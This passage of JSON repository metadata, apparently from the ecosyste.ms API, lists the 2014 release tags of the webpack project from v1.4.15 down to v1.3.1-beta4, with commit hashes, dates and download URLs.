rsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/web